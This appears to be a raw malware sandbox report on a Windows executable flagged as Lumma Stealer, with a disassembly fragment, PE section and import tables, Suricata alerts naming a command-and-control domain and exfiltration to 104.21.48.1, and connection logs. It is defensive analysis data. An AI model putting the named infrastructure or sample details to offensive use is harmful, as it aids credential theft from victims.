                                                                                                lea ecx, dword ptr [ebp-04h]
                                                                                                xor eax, dword ptr [ebp-14h]
                                                                                                xor eax, dword ptr [ebp-04h]
                                                                                                xor eax, ecx
                                                                                                leave
                                                                                                ret
                                                                                                mov eax, 00004000h
                                                                                                ret
                                                                                                push 00431AB8h
                                                                                                call dword ptr [0042E8F8h]
                                                                                                ret
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                int3
                                                                                                mov al, 01h
                                                                                                ret
                                                                                                push 00030000h
                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x2e6c40x28.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x340000xe8.rsrc
                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x350000x1b90.reloc
                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x2a9a80x18.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x26e400xc0.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x2e8340x148.rdata
                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                .text0x10000x247da0x24800ba0610d1e4ecb6f5f64959d9eb5b455aFalse0.5549951840753424data6.559506263512015IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                .rdata0x260000x9eb40xa00053eba87ddc7d2455b0ac2836680b1660False0.428271484375DOS executable (COM)4.9181666163124085IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .data0x300000x22800x1600112d0c9e43893ae5b7f96d23807996acFalse0.39506392045454547data4.581141173428789IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .tls0x330000x90x2001f354d76203061bfdd5a53dae48d5435False0.033203125data0.020393135236084953IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .rsrc0x340000xe80x20003d6bf5d1e31277fc8fb90374111d794False0.306640625data2.344915704357875IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                .reloc0x350000x1b900x1c003080b38ba0e27b64b3ab5ca0f93c1c7cFalse0.7785993303571429data6.532705218372571IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                .BSS0x370000x4b4000x4b400f4a6f0ab2f6a1191734ef7d005e64463False1.0003276837624584data7.999361309867783IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                .BSS0x830000x4b4000x4b400f4a6f0ab2f6a1191734ef7d005e64463False1.0003276837624584data7.999361309867783IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                RT_MANIFEST0x340600x87XML 1.0 document, ASCII textEnglishUnited States0.8222222222222222
                                                                                                DLLImport
                                                                                                KERNEL32.dllAcquireSRWLockExclusive, CloseHandle, CompareStringW, CreateFileW, DecodePointer, DeleteCriticalSection, EncodePointer, EnterCriticalSection, EnumSystemLocalesW, ExitProcess, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetConsoleMode, GetConsoleOutputCP, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetEnvironmentStringsW, GetFileSize, GetFileSizeEx, GetFileType, GetLastError, GetLocaleInfoW, GetModuleFileNameW, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetOEMCP, GetProcAddress, GetProcessHeap, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemTimeAsFileTime, GetUserDefaultLCID, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, InitializeCriticalSectionEx, InitializeSListHead, IsDebuggerPresent, IsProcessorFeaturePresent, IsValidCodePage, IsValidLocale, LCMapStringEx, LCMapStringW, LeaveCriticalSection, LoadLibraryExW, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadConsoleW, ReadFile, ReleaseSRWLockExclusive, RtlUnwind, SetEnvironmentVariableW, SetFilePointerEx, SetLastError, SetStdHandle, SetUnhandledExceptionFilter, SleepConditionVariableSRW, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, WakeAllConditionVariable, WideCharToMultiByte, WriteConsoleW, WriteFile
                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                EnglishUnited States
                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                2025-01-01T02:56:55.706456+01002058656ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fancywaxxers .shop)1192.168.2.4610801.1.1.153UDP
                                                                                                2025-01-01T02:56:56.188431+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.449730104.21.48.1443TCP
                                                                                                2025-01-01T02:56:56.188431+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730104.21.48.1443TCP
                                                                                                2025-01-01T02:56:56.941241+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730104.21.48.1443TCP
                                                                                                2025-01-01T02:56:56.941241+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730104.21.48.1443TCP
                                                                                                2025-01-01T02:56:57.422798+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.449731104.21.48.1443TCP
                                                                                                2025-01-01T02:56:57.422798+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.48.1443TCP
                                                                                                2025-01-01T02:56:57.893852+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731104.21.48.1443TCP
                                                                                                2025-01-01T02:56:57.893852+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.48.1443TCP
                                                                                                2025-01-01T02:56:58.724005+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.449732104.21.48.1443TCP
                                                                                                2025-01-01T02:56:58.724005+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732104.21.48.1443TCP
                                                                                                2025-01-01T02:56:59.828044+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.449733104.21.48.1443TCP
                                                                                                2025-01-01T02:56:59.828044+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.48.1443TCP
                                                                                                2025-01-01T02:57:00.384585+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449733104.21.48.1443TCP
                                                                                                2025-01-01T02:57:01.065590+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.449734104.21.48.1443TCP
                                                                                                2025-01-01T02:57:01.065590+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734104.21.48.1443TCP
                                                                                                2025-01-01T02:57:02.521703+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.449735104.21.48.1443TCP
                                                                                                2025-01-01T02:57:02.521703+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449735104.21.48.1443TCP
                                                                                                2025-01-01T02:57:04.160117+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.449736104.21.48.1443TCP
                                                                                                2025-01-01T02:57:04.160117+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736104.21.48.1443TCP
                                                                                                2025-01-01T02:57:04.233693+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.449736104.21.48.1443TCP
                                                                                                2025-01-01T02:57:06.388204+01002058657ET MALWARE Observed Win32/Lumma Stealer Related Domain (fancywaxxers .shop in TLS SNI)1192.168.2.449737104.21.48.1443TCP
                                                                                                2025-01-01T02:57:06.388204+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737104.21.48.1443TCP
                                                                                                2025-01-01T02:57:06.874165+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449737104.21.48.1443TCP
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Jan 1, 2025 02:56:55.724112988 CET49730443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:55.724159002 CET44349730104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:55.724231958 CET49730443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:55.727045059 CET49730443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:55.727061033 CET44349730104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:56.188210964 CET44349730104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:56.188431025 CET49730443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:56.191973925 CET49730443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:56.191996098 CET44349730104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:56.192424059 CET44349730104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:56.239005089 CET49730443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:56.239005089 CET49730443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:56.239140987 CET44349730104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:56.941248894 CET44349730104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:56.941344023 CET44349730104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:56.941565990 CET49730443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:56.943289042 CET49730443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:56.943289042 CET49730443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:56.943351030 CET44349730104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:56.943377972 CET44349730104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:56.952259064 CET49731443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:56.952290058 CET44349731104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:56.952394962 CET49731443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:56.952718019 CET49731443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:56.952728033 CET44349731104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:57.422725916 CET44349731104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:57.422797918 CET49731443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:57.424338102 CET49731443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:57.424341917 CET44349731104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:57.424561024 CET44349731104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:57.425796032 CET49731443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:57.425825119 CET49731443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:57.425860882 CET44349731104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:57.893853903 CET44349731104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:57.893924952 CET44349731104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:57.893950939 CET44349731104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:57.893981934 CET49731443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:57.893987894 CET44349731104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:57.893997908 CET44349731104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:57.894153118 CET49731443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:57.894167900 CET44349731104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:57.894212008 CET49731443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:57.894355059 CET44349731104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:57.898560047 CET44349731104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:57.898588896 CET44349731104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:57.898610115 CET49731443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:57.898614883 CET44349731104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:57.898653984 CET44349731104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:57.898669958 CET49731443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:57.898674965 CET44349731104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:57.898710966 CET49731443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:57.982398033 CET44349731104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:57.982453108 CET44349731104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:57.982537031 CET44349731104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:57.982614040 CET49731443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:57.982614040 CET49731443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:57.982784033 CET49731443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:57.982796907 CET44349731104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:57.982808113 CET49731443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:57.982814074 CET44349731104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:58.179162025 CET49732443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:58.179198027 CET44349732104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:58.179287910 CET49732443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:58.179841995 CET49732443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:58.179852962 CET44349732104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:58.723886967 CET44349732104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:58.724004984 CET49732443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:58.725336075 CET49732443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:58.725344896 CET44349732104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:58.725548983 CET44349732104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:58.726732016 CET49732443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:58.726896048 CET49732443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:58.726926088 CET44349732104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:58.726984978 CET49732443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:58.726990938 CET44349732104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:59.323582888 CET44349732104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:59.323676109 CET44349732104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:59.323735952 CET49732443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:59.323946953 CET49732443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:59.323964119 CET44349732104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:59.373073101 CET49733443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:59.373111010 CET44349733104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:59.373202085 CET49733443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:59.373506069 CET49733443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:59.373521090 CET44349733104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:59.827948093 CET44349733104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:59.828043938 CET49733443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:59.829384089 CET49733443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:59.829392910 CET44349733104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:59.829610109 CET44349733104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:56:59.830872059 CET49733443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:59.830996037 CET49733443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:56:59.831026077 CET44349733104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:00.384589911 CET44349733104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:00.384706020 CET44349733104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:00.384789944 CET49733443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:00.384967089 CET49733443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:00.384982109 CET44349733104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:00.571120977 CET49734443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:00.571171999 CET44349734104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:00.571249962 CET49734443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:00.601761103 CET49734443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:00.601780891 CET44349734104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:01.065496922 CET44349734104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:01.065589905 CET49734443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:01.078742981 CET49734443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:01.078754902 CET44349734104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:01.079081059 CET44349734104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:01.082881927 CET49734443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:01.086514950 CET49734443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:01.086564064 CET44349734104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:01.086631060 CET49734443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:01.086639881 CET44349734104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:01.582303047 CET44349734104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:01.582418919 CET44349734104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:01.582484007 CET49734443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:01.582593918 CET49734443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:01.582609892 CET44349734104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:02.061391115 CET49735443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:02.061431885 CET44349735104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:02.061521053 CET49735443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:02.061821938 CET49735443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:02.061836004 CET44349735104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:02.521608114 CET44349735104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:02.521703005 CET49735443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:02.522911072 CET49735443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:02.522917986 CET44349735104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:02.523123980 CET44349735104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:02.524277925 CET49735443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:02.524383068 CET49735443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:02.524394989 CET44349735104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:03.258507013 CET44349735104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:03.258589983 CET44349735104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:03.258644104 CET49735443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:03.258840084 CET49735443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:03.258861065 CET44349735104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:03.706300020 CET49736443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:03.706341982 CET44349736104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:03.706425905 CET49736443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:03.706747055 CET49736443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:03.706767082 CET44349736104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:04.160037994 CET44349736104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:04.160116911 CET49736443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:04.204164982 CET49736443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:04.204186916 CET44349736104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:04.204416990 CET44349736104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:04.232280016 CET49736443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:04.233014107 CET49736443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:04.233050108 CET44349736104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:04.233170033 CET49736443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:04.233203888 CET44349736104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:04.233338118 CET49736443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:04.233382940 CET44349736104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:04.233515978 CET49736443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:04.233546972 CET44349736104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:04.233733892 CET49736443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:04.233771086 CET44349736104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:04.233942032 CET49736443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:04.233969927 CET44349736104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:04.233980894 CET49736443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:04.233999014 CET44349736104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:04.234138012 CET49736443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:04.234160900 CET44349736104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:04.234191895 CET49736443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:04.234333038 CET49736443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:04.234360933 CET49736443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:04.243324995 CET44349736104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:04.243551970 CET49736443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:04.243587017 CET44349736104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:04.243611097 CET49736443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:04.243632078 CET44349736104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:04.243681908 CET49736443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:04.248636007 CET44349736104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:05.835031986 CET44349736104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:05.835115910 CET44349736104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:05.835258007 CET49736443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:05.835381031 CET49736443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:05.835402012 CET44349736104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:05.905159950 CET49737443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:05.905210018 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:05.905293941 CET49737443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:05.905684948 CET49737443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:05.905697107 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.388115883 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.388204098 CET49737443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:06.389559031 CET49737443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:06.389576912 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.389801025 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.391045094 CET49737443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:06.391072989 CET49737443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:06.391115904 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.874170065 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.874213934 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.874244928 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.874278069 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.874283075 CET49737443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:06.874310017 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.874326944 CET49737443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:06.874357939 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.874391079 CET49737443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:06.874397993 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.874524117 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.874558926 CET49737443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:06.874561071 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.874574900 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.874610901 CET49737443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:06.874615908 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.878911972 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.878954887 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.879117012 CET49737443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:06.879251957 CET49737443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:06.879270077 CET44349737104.21.48.1192.168.2.4
                                                                                                Jan 1, 2025 02:57:06.879282951 CET49737443192.168.2.4104.21.48.1
                                                                                                Jan 1, 2025 02:57:06.879290104 CET44349737104.21.48.1192.168.2.4
                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Jan 1, 2025 02:56:55.706455946 CET6108053192.168.2.41.1.1.1
                                                                                                Jan 1, 2025 02:56:55.718822002 CET53610801.1.1.1192.168.2.4
                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
